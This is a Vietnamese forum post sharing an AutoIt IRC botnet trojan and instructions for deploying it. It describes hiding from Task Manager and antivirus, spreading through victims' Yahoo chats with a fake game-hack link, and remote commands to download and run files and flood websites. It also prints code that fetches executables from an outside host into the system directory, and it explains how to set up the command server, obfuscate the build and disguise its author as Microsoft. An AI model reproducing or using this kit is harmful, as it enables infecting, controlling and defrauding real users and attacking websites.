ban tu tim hieu va tu tao cho minh mot con bot di.kai nay ko share dau fai de danh rieng cho minh chu!hehe :D
ban tham khao ben duoi di
ƯU :
[+] Dễ dùng
[+] Không hiện các thông tin trên Taskmrg , regedit , tự tắt các chương trình xem Process
[+] Không bị lỗi lệnh
[+] chỉ điều khiển đc khi thằng đưa lệnh là Nick các bạn khai báo trong host.data dòng Nick=
[+] tự dụ nhưng người đang chat với victim trên yahoo - VD bạn đang chat với thằng ABC_DEF thì khi dính con này nó sẽ lấy Tên nick của bạn(VD nick bạn là Victim_ABC) và tên ních thằng ABC_DEF rồi send 1 dòng :
Hack CF mới - ABC_DEF down theo link sau nếu muốn :http://linkbot
Link do mình post không có virus đâu - Victim_ABC
Nhược :
[+] Do viết = autoit nên nó nặng 299 KB
[+] Khó phát tán do nặng
[+] chỉ có 2 anti phát hiện ra trojan từ file bot (Bkav cũng ko tìm ra ) ngoài ra các anti khác đều ko có phát hiện virrus gì cả
Yêu cầu : có 1 website nhỏ,có Domain nhất định phòng khi host chứa webiste die thì chuyển DNS qua host khác để bot vẫn tiếp tục lấy được các thông tin
Server,port,nick,pass
Các Chức năng :
login#pass
notice#type#title#text ; gửi 1 thông báo tới tất cả bot
type dạng thông báo , các bạn down tại phía dưới để xem các thông số :
[You must be registered and logged in to see this link.]download#link ; tải 1 file về máy của bot
run#ptah ; chạy 1 file từ máy của bot (Điều kiện : nếu file có trong máy victim)
process#name ; tắt 1 process dang chạy trên máy của bot
window#name ; tắt 1 cửa sổ đang hiện trên máy của bot
clipboard#text ; chèn đoạn text vào clipboard của bot(có nghĩa là nó Ctrl+V hay chuột phải + Past -> sẽ đưa ra đoạn text của mình)
miniall# ; minimize tất cả cửa sổ trên máy bot
chatbot#all/Nickbot#text ; chat với bot (nếu all thì chat với tất cả bot) - (nếu là tên của 1 bot thì chỉ caht với bot đó thôi VD chatbox#bot-may8-123456#May da bi dinh bot hahaha -> thì nó chỉ gữi đoạn chat tới thằng có tên bot-may8-123456 )
report# ; bắt bot khai báo tên của mình
flood#website#index ; flood 1 website không có firewall
connectagain# bắt bot tải các thông tin từ host.data và kết nối lại tới server IRC
yahoochat#text ; tự chát tới 1 của sổ yahoo của bot đang hiển thị VD: tôi đang chatr với thằng keng_ken_hn thì khi dùng lệnh này nó sẽ tự chat với keng_ken_hn đoạn text đó
editavataryahoo#link ; sửa avatar của victim cái này chỉ có máy của victim thấy thôi dùng để hù nó cho vui hhjhjhj
+ Còn flood website có firewall thì chừng nào có đối tượng các bạn tự code sau đó gửi lenh download + run để bot chạy nó,vì mỗi web mỗi khác nên tui ko có code flood website có firewall cho bot các bạn thông cảm nha
Cách chỉnh sửa bot :
Mở system.au3 lên - sau đó ctrl + h tìm dòng :
Dòng 1 các bạn ghi :
[You must be registered and logged in to see this link.]Dòng 2 các bạn ghi :
[You must be registered and logged in to see this link.] của bạn .com/host.data
Bấm Replace All
sau đó bỏ hết 2 dòng , gõ lại :
Dòng 1 :
Bấm Replace All
sau đó bỏ hết 2 dòng , gõ lại :
[You must be registered and logged in to see this link.]Dòng 2 :
[You must be registered and logged in to see this link.] dự phòng của bạn.com/host.data
dối với host dự phòng các bạn có thể dùng ripway.com hay fileden.com
++++++++++++++++++++++++++++++++++++++++++++++++++ ++++
If not FileExists(@SystemDir & "\support.exe") Then InetGet("http://thongtinddos.com/support.exe",@SystemDir & "/support.exe",1)
If not FileExists(@SystemDir & "\DDOS.exe") Then InetGet("http://thongtinddos.com/DDOS.exe",@SystemDir & "/DDOS.exe",1)
If not FileExists(@SystemDir & "\system.exe") Then FileCopy(@ScriptFullPath,@SystemDir & "\system.exe")
Các dòng đỏ các bạn sửa lại thành host sẽ lưu các file :support.exe và Ddos.exe
++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++
ctrl + f tìm
Case $0000[2] = "admin"
sửa "admin" thành "pass đẻ login bot" (nhớ để 2 dấu " ở đầu và cuối )
VD:
Case $0000[2] = "login"
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++
các ban có thể sửa các message lại nếu mún
Bước cuối :
các bạn chép đè file .....Botnet\Linh tinh\AutoItSC.bin vào thư mục
C:\Program Files\AutoIt3\Aut2Exe (Thư mục mặc định của autoit)
Các bạn chuột phải lần lượt vào các file system.au3,support.au3,ddos.au3 chọn compile with op...chọn icon cho file khi dịch ra exe,tab resouce update các ghi vào dòng 2 và dòng 4 tên tác giả của file (VD microsoft ),tab Obfuscator các bạn check vào ô Run obfuscator......,dòng dưới ghi /cs 1/cn 1/cf 1/cv 1/cv 1/sv 1
sau đó bấm Compile.....
Trong mục linh tinh có file : FTP - StringToBinary.exe
Chức năng 1 : các bạn mở nó lên bấm F1 sau đó ghi vào tên server,port,nick(nick của bạn sử dụng trong ỉrc để điều khiển bot) - mỗi cái cách nhau bằng "|"
VD : ircviet.net|6667|Master
Sau đó bấm ok nó sẽ dịch :ircviet.net|6667|Master ra dạng mã hoá,các bạn copy các dòng mã hoá tương ứng vào host.dât
VD : ircviet.net|6667|Master -> AU3780x7465787431 AU3780x7465787432 AU3780x74657874 (cách nhau bởi khoản trắng)
các bạn copy các dòng tương ứng vào sau :server=,port=,nick=
Chức năng 2 : các bạn ghi use,pass,server FTP của bạn,rồi chọn file host.data
dòng /public_html/thongtinddos.com/host.data là thư mục lưu file host.data của các bạn trên host
các bạn up 2 file support.exe,ddos.exe lên host các bạn đã chĩnh ở trên
còn file system.exe các bạn mún up len đâu cũng được vì nó tự copy nó sang system
Download Botnet :
[You must be registered and logged in to see this link.]nguồn: virusvn